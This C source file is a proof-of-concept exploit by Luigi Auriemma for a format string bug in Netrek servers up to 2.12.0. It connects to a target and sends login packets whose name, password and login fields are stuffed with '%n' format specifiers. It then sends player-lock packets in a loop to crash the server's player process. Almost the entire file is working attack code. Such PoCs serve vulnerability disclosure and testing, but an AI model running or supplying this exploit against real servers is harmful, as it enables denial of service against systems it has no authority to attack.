/*

by Luigi Auriemma

*/

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <time.h>

#ifdef WIN32
    #include <winsock.h>
    #include "winerr.h"

    #define close   closesocket
    #define sleep   Sleep
    #define ONESEC  1000
    DWORD       tid,
                ret;
    HANDLE      th;
#else
    #include <unistd.h>
    #include <sys/socket.h>
    #include <sys/types.h>
    #include <arpa/inet.h>
    #include <netinet/in.h>
    #include <netdb.h>
    #include <sys/times.h>
    #include <pthread.h>

    #define ONESEC  1
    pthread_t   tid;
    int         th;
#endif



#ifdef WIN32
    #define MSTHREAD(NAME,ARG)  DWORD WINAPI NAME(ARG)
    #define MSTHREADX(TH,TID,THR,PAR)                                   \
        TH = CreateThread(NULL, 0, (void *)&THR, (void *)PAR, 0, &TID); \
        if(!TH) {                                                       \
            fprintf(stderr, "\nError: Unable to create thread\n\n");    \
            exit(1);                                                    \
        }
    #define MSTHREADF                                                   \
        for(;;) {                                                       \
            GetExitCodeThread(th, &ret);                                \
            if(!ret) break;                                             \
            sleep(100);                                                 \
        }
#else
    #define MSTHREAD(NAME,ARG)  void *NAME(ARG)
    #define MSTHREADX(TH,TID,THR,PAR)                                   \
        TH = pthread_create(&TID, NULL, (void *)&THR, (void *)PAR);     \
        if(TH) {                                                        \
            fprintf(stderr, "\nError: Unable to create thread\n\n");    \
            exit(1);                                                    \
        }
    #define MSTHREADF   pthread_join(tid, NULL);
#endif



#define VER     "0.1"
#define X(Y)    ((struct Y##_cpacket *)buff)



int netrek_send(int sd, int type, u_char *buff);
MSTHREAD(netrek_recv, int sd);
int timeout(int sock);
u_int resolv(char *host);
void std_err(void);



#include "packets.h"



int     crashed = 0;



int main(int argc, char *argv[]) {
    struct  sockaddr_in peer;
    int     sd,
            i;
    u_short port = 2592;
    u_char  buff[256];

#ifdef WIN32
    WSADATA    wsadata;
    WSAStartup(MAKEWORD(1,0), &wsadata);
#endif

    setbuf(stdout, NULL);

    fputs("\n"
        "Netrek server <= 2.12.0 format string bug "VER"\n"
        "by Luigi Auriemma\n"
        "e-mail: aluigi@autistici.org\n"
        "web:    aluigi.org\n"
        "\n", stdout);

    if(argc < 2) {
        printf("\n"
            "Usage: %s <server> [port(%hu)]\n"
            "\n"
            "note: the server must have eventlog enabled to be vulnerable\n"
            "\n", argv[0], port);
        exit(1);
    }

    if(argc > 2) port = atoi(argv[2]);
    peer.sin_addr.s_addr = resolv(argv[1]);
    peer.sin_port        = htons(port);
    peer.sin_family      = AF_INET;
    printf("- connect to %s:%hu\n", inet_ntoa(peer.sin_addr), ntohs(peer.sin_port));

    sd = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP);
    if(sd < 0) std_err();
    if(connect(sd, (struct sockaddr *)&peer, sizeof(peer))
      < 0) std_err();

    MSTHREADX(th, tid, netrek_recv, sd)

    printf("- send CP_SOCKET\n");
    X(socket)->version          = 4;
    X(socket)->udp_version      = 10;
    X(socket)->socket           = 0;
    if(netrek_send(sd, CP_SOCKET, buff) < 0) goto quit;
    sleep(ONESEC * 2);

    printf("- send CP_LOGIN\n");
    X(login)->query             = 0;
    strcpy(X(login)->name,      "%n%n%n%n%n%n%n%n");
    strcpy(X(login)->password,  "%n%n%n%n%n%n%n%n");
    strcpy(X(login)->login,     "%n%n%n%n%n%n%n%n");
    if(netrek_send(sd, CP_LOGIN, buff) < 0) goto quit;
    sleep(ONESEC * 2);

    printf("- send CP_OUTFIT\n");
    X(outfit)->team             = 0;
    X(outfit)->ship             = 0;
    if(netrek_send(sd, CP_OUTFIT, buff) < 0) goto quit;
    sleep(ONESEC * 2);

    printf("- send CP_PLAYLOCK for exploiting the bug\n");
    for(i = 0; i < MAXPLAYER; i++) {
        printf("- try locking player %d\n", i);
        X(playlock)->pnum       = i;
        if(crashed || (netrek_send(sd, CP_PLAYLOCK, buff) < 0)) {
            printf(
                "- connection interrupted\n"
                "  probably the process for this player crashed due to the format string bug!\n");
            goto quit;
        }
        sleep(ONESEC);
    }

    printf("- server doesn't seem vulnerable, it has been fixed or eventlog is disabled\n");

quit:
    MSTHREADF
    close(sd);
    return(0);
}



int netrek_send(int sd, int type, u_char *buff) {
    int     insz;

    buff[0] = type;
    insz    = client_size[type];

    if(send(sd, buff, insz, 0) != insz) return(-1);
    return(0);
}



MSTHREAD(netrek_recv, int sd) {
    int     t,
            len,
            type,
            outsz;
    u_char  buff[256],
            *p;

    for(;;) {
        if(recv(sd, buff, 1, 0) < 0) goto crash;
        type  = buff[0];
        outsz = server_size[type];

        for(p = buff + 1, len = outsz - 1; len; ) {
            t = recv(sd, p, len, 0);
            if(t <= 0) goto crash;
            p   += t;
            len -= t;
        }

        if(type == SP_MOTD) printf("  %.*s\n", MSG_LEN, ((struct motd_spacket *)buff)->line);
    }

    return(0);

crash:
    crashed = 1;
    return(0);
}



u_int resolv(char *host) {
    struct  hostent *hp;
    u_int   host_ip;

    host_ip = inet_addr(host);
    if(host_ip == INADDR_NONE) {
        hp = gethostbyname(host);
        if(!hp) {
            printf("\nError: Unable to resolv hostname (%s)\n",
                host);
            exit(1);
        } else host_ip = *(u_int *)(hp->h_addr);
    }
    return(host_ip);
}



#ifndef WIN32
    void std_err(void) {
        perror("\nError");
        exit(1);
    }
#endif


